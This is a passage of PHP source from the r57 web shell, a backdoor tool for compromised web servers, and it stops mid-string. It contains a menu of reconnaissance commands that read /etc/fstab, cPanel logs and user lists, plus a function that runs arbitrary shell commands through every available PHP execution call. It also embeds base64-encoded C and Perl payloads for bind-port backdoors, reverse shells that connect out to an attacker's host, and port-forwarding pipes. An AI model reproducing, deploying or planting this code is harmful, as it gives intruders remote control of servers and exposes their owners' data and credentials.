  2252. 'Vision case volumes and the possibility of execution'=>'cat /etc/fstab',
  2253. 'Watch file Alellouk to enter Elsie Banl sites server'=>'cat /var/cpanel/accounting.log',
  2254. 'Details of the operations are now working Balndham'=>'ps aux',
  2255. 'Currently users connected'=>'w',
  2256. 'Other users Atsalo'=>'lastlog',
  2257. 'Screening tools clouds wget curl ..etc'=>'which wget curl w3m lynx',
  2258. 'Check translation tool gcc'=>'locate gcc',
  2259.  
  2260.  
  2261.  
  2262. '----------------------------------------------------------------------------------------------------'=>'ls -la'
  2263. );
  2264. $table_up1  = "<tr><td bgcolor=#272727><font face=tahoma size=-2><b><div align=center>:: ";
  2265. $table_up2  = " ::</div></b></font></td></tr><tr><td>";
  2266. $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#333333>";
  2267. $table_end1 = "</td></tr>";
  2268. $arrow = " <font face=Webdings color=gray>4</font>";
  2269. $lb = "<font color=black>[</font>";
  2270. $rb = "<font color=black>]</font>";
  2271. $font = "<font face=tahoma size=-2>";
  2272. $ts = "<table class=table1 width=100% align=center>";
  2273. $te = "</table>";
  2274. $fs = "<form name=form method=POST>";
  2275. $fe = "</form>";
  2276.  
  2277. if(isset($_GET['users']))
  2278.  {
  2279.  if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  2280.  else
  2281.   {
  2282.   echo '<center>';
  2283.   foreach($users as $user) { echo $user."<br>"; }
  2284.   echo '</center>';
  2285.   }
  2286.  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  2287.  }
  2288.  
  2289. if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
  2290. $dir = @getcwd();
  2291. $unix = 0;
  2292. if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
  2293. if(empty($dir))
  2294.  {
  2295.  $os = getenv('OS');
  2296.  if(empty($os)){ $os = php_uname(); }
  2297.  if(empty($os)){ $os ="-"; $unix=1; }
  2298.  else
  2299.     {
  2300.     if(@eregi("^win",$os)) { $unix = 0; }
  2301.     else { $unix = 1; }
  2302.     }
  2303.  }
  2304. if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  2305.   {
  2306.     echo $head;
  2307.     if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
  2308.     else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
  2309.     $sr->SearchText(0,0);
  2310.     $res = $sr->GetResultFiles();
  2311.     $found = $sr->GetMatchesCount();
  2312.     $titles = $sr->GetTitles();
  2313.     $r = "";
  2314.     if($found > 0)
  2315.     {
  2316.       $r .= "<TABLE width=100%>";
  2317.       foreach($res as $file=>$v)
  2318.       {
  2319.         $r .= "<TR>";
  2320.         $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
  2321.         $r .= (!$unix)? str_replace("/","\\",$file) : $file;
  2322.         $r .= "</b></font></ TD>";
  2323.         $r .= "</TR>";
  2324.         foreach($v as $a=>$b)
  2325.         {
  2326.           $r .= "<TR>";
  2327.           $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
  2328.           $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
  2329.           $r .= "</TR>\n";
  2330.         }
  2331.       }
  2332.       $r .= "</TABLE>";
  2333.     echo $r;
  2334.     }
  2335.     else
  2336.     {
  2337.       echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
  2338.     }
  2339.   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  2340.   die();
  2341.   }
  2342. if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
  2343. $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
  2344. if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
  2345. function ws($i)
  2346. {
  2347. return @str_repeat("&nbsp;",$i);
  2348. }
  2349. function ex($cfe)
  2350. {
  2351.  $res = '';
  2352.  if (!empty($cfe))
  2353.  {
  2354.   if(function_exists('exec'))
  2355.    {
  2356.     @exec($cfe,$res);
  2357.     $res = join("\n",$res);
  2358.    }
  2359.   elseif(function_exists('shell_exec'))
  2360.    {
  2361.     $res = @shell_exec($cfe);
  2362.    }
  2363.   elseif(function_exists('system'))
  2364.    {
  2365.     @ob_start();
  2366.     @system($cfe);
  2367.     $res = @ob_get_contents();
  2368.     @ob_end_clean();
  2369.    }
  2370.   elseif(function_exists('passthru'))
  2371.    {
  2372.     @ob_start();
  2373.     @passthru($cfe);
  2374.     $res = @ob_get_contents();
  2375.     @ob_end_clean();
  2376.    }
  2377.   elseif(@is_resource($f = @popen($cfe,"r")))
  2378.   {
  2379.    $res = "";
  2380.    while(!@feof($f)) { $res .= @fread($f,1024); }
  2381.    @pclose($f);
  2382.   }
  2383.  }
  2384.  return $res;
  2385. }
  2386. function get_users()
  2387. {
  2388.   $users = array();
  2389.   $rows=file('/etc/passwd');
  2390.   if(!$rows) return 0;
  2391.   foreach ($rows as $string)
  2392.    {
  2393.            $user = @explode(":",$string);
  2394.            if(substr($string,0,1)!='#') array_push($users,$user[0]);
  2395.    }
  2396.   return $users;
  2397. }
  2398. function err($n,$txt='')
  2399. {
  2400. echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
  2401. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
  2402. if(!empty($txt)) { echo " $txt"; }
  2403. echo '</b></div></font></td></tr></table>';
  2404. return null;
  2405. }
  2406. function perms($mode)
  2407. {
  2408. if (!$GLOBALS['unix']) return 0;
  2409. if( $mode & 0x1000 ) { $type='p'; }
  2410. else if( $mode & 0x2000 ) { $type='c'; }
  2411. else if( $mode & 0x4000 ) { $type='d'; }
  2412. else if( $mode & 0x6000 ) { $type='b'; }
  2413. else if( $mode & 0x8000 ) { $type='-'; }
  2414. else if( $mode & 0xA000 ) { $type='l'; }
  2415. else if( $mode & 0xC000 ) { $type='s'; }
  2416. else $type='u';
  2417. $owner["read"] = ($mode & 00400) ? 'r' : '-';
  2418. $owner["write"] = ($mode & 00200) ? 'w' : '-';
  2419. $owner["execute"] = ($mode & 00100) ? 'x' : '-';
  2420. $group["read"] = ($mode & 00040) ? 'r' : '-';
  2421. $group["write"] = ($mode & 00020) ? 'w' : '-';
  2422. $group["execute"] = ($mode & 00010) ? 'x' : '-';
  2423. $world["read"] = ($mode & 00004) ? 'r' : '-';
  2424. $world["write"] = ($mode & 00002) ? 'w' : '-';
  2425. $world["execute"] = ($mode & 00001) ? 'x' : '-';
  2426. if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
  2427. if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
  2428. if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
  2429. $s=sprintf("%1s", $type);
  2430. $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
  2431. $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
  2432. $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  2433. return trim($s);
  2434. }
  2435. function in($type,$name,$size,$value,$checked=0)
  2436. {
  2437.  $ret = "<input type=".$type." name=".$name." ";
  2438.  if($size != 0) { $ret .= "size=".$size." "; }
  2439.  $ret .= "value=\"".$value."\"";
  2440.  if($checked) $ret .= " checked";
  2441.  return $ret.">";
  2442. }
  2443. function which($pr)
  2444. {
  2445. $path = ex("which $pr");
  2446. if(!empty($path)) { return $path; } else { return $pr; }
  2447. }
  2448. function cf($fname,$text)
  2449. {
  2450.  $w_file=@fopen($fname,"w") or err(0);
  2451.  if($w_file)
  2452.  {
  2453.  @fputs($w_file,@base64_decode($text));
  2454.  @fclose($w_file);
  2455.  }
  2456. }
  2457. function sr($l,$t1,$t2)
  2458.  {
  2459.  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
  2460.  }
  2461. if (!@function_exists("view_size"))
  2462. {
  2463. function view_size($size)
  2464. {
  2465.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  2466.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  2467.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  2468.  else {$size = $size . " B";}
  2469.  return $size;
  2470. }
  2471. }
  2472.   function DirFilesR($dir,$types='')
  2473.   {
  2474.     $files = Array();
  2475.     if(($handle = @opendir($dir)))
  2476.     {
  2477.       while (false !== ($file = @readdir($handle)))
  2478.       {
  2479.         if ($file != "." && $file != "..")
  2480.         {
  2481.           if(@is_dir($dir."/".$file))
  2482.             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
  2483.           else
  2484.           {
  2485.             $pos = @strrpos($file,".");
  2486.             $ext = @substr($file,$pos,@strlen($file)-$pos);
  2487.             if($types)
  2488.             {
  2489.               if(@in_array($ext,explode(';',$types)))
  2490.                 $files[] = $dir."/".$file;
  2491.             }
  2492.             else
  2493.               $files[] = $dir."/".$file;
  2494.           }
  2495.         }
  2496.       }
  2497.       @closedir($handle);
  2498.     }
  2499.     return $files;
  2500.   }
  2501.   class SearchResult
  2502.   {
  2503.     var $text;
  2504.     var $FilesToSearch;
  2505.     var $ResultFiles;
  2506.     var $FilesTotal;
  2507.     var $MatchesCount;
  2508.     var $FileMatschesCount;
  2509.     var $TimeStart;
  2510.     var $TimeTotal;
  2511.     var $titles;
  2512.     function SearchResult($dir,$text,$filter='')
  2513.     {
  2514.       $dirs = @explode(";",$dir);
  2515.       $this->FilesToSearch = Array();
  2516.       for($a=0;$a<count($dirs);$a++)
  2517.         $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
  2518.       $this->text = $text;
  2519.       $this->FilesTotal = @count($this->FilesToSearch);
  2520.       $this->TimeStart = getmicrotime();
  2521.       $this->MatchesCount = 0;
  2522.       $this->ResultFiles = Array();
  2523.       $this->FileMatchesCount = Array();
  2524.       $this->titles = Array();
  2525.     }
  2526.     function GetFilesTotal() { return $this->FilesTotal; }
  2527.     function GetTitles() { return $this->titles; }
  2528.     function GetTimeTotal() { return $this->TimeTotal; }
  2529.     function GetMatchesCount() { return $this->MatchesCount; }
  2530.     function GetFileMatchesCount() { return $this->FileMatchesCount; }
  2531.     function GetResultFiles() { return $this->ResultFiles; }
  2532.     function SearchText($phrase=0,$case=0) {
  2533.     $qq = @explode(' ',$this->text);
  2534.     $delim = '|';
  2535.       if($phrase)
  2536.         foreach($qq as $k=>$v)
  2537.           $qq[$k] = '\b'.$v.'\b';
  2538.       $words = '('.@implode($delim,$qq).')';
  2539.       $pattern = "/".$words."/";
  2540.       if(!$case)
  2541.         $pattern .= 'i';
  2542.       foreach($this->FilesToSearch as $k=>$filename)
  2543.       {
  2544.         $this->FileMatchesCount[$filename] = 0;
  2545.         $FileStrings = @file($filename) or @next;
  2546.         for($a=0;$a<@count($FileStrings);$a++)
  2547.         {
  2548.           $count = 0;
  2549.           $CurString = $FileStrings[$a];
  2550.           $CurString = @Trim($CurString);
  2551.           $CurString = @strip_tags($CurString);
  2552.           $aa = '';
  2553.           if(($count = @preg_match_all($pattern,$CurString,$aa)))
  2554.           {
  2555.             $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
  2556.             $this->ResultFiles[$filename][$a+1] = $CurString;
  2557.             $this->MatchesCount += $count;
  2558.             $this->FileMatchesCount[$filename] += $count;
  2559.           }
  2560.         }
  2561.       }
  2562.       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
  2563.     }
  2564.   }
  2565.   function getmicrotime()
  2566.   {
  2567.     list($usec,$sec) = @explode(" ",@microtime());
  2568.     return ((float)$usec + (float)$sec);
  2569.   }
  2570. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
  2571. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
  2572. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
  2573. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
  2574. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
  2575. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
  2576. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
  2577. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
  2578. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
  2579. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
  2580. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
  2581. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
  2582. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
  2583. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
  2584. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
  2585. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
  2586. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
  2587. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
  2588. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  2589. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
  2590. lIENPTk47DQpleGl0IDA7DQp9DQp9";
  2591. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  2592. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  2593. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  2594. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  2595. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  2596. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  2597. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  2598. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
  2599. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
  2600. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
  2601. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
  2602. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
  2603. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
  2604. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
  2605. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  2606. $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
  2607. x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
  2608. HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
  2609. aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
  2610. lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
  2611. xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
  2612. W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
  2613. LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
  2614. udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
  2615. 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
  2616. iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
  2617. KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
  2618. gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
  2619. hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
  2620. iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
  2621. ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
  2622. vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
  2623. AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
  2624. QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
  2625. ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
  2626. gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
  2627. wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
  2628. 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
  2629. MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
  2630. gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
  2631. 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
  2632. HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
  2633. dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
  2634. KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
  2635. ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
  2636. E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
  2637. Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
  2638. NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
  2639. J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
  2640. CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
  2641. dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
  2642. gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
  2643. lsZSk7DQogIHJldHVybiAwOw0KfQ==";
  2644. $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
  2645. CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
  2646. bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
  2647. gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
  2648. NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
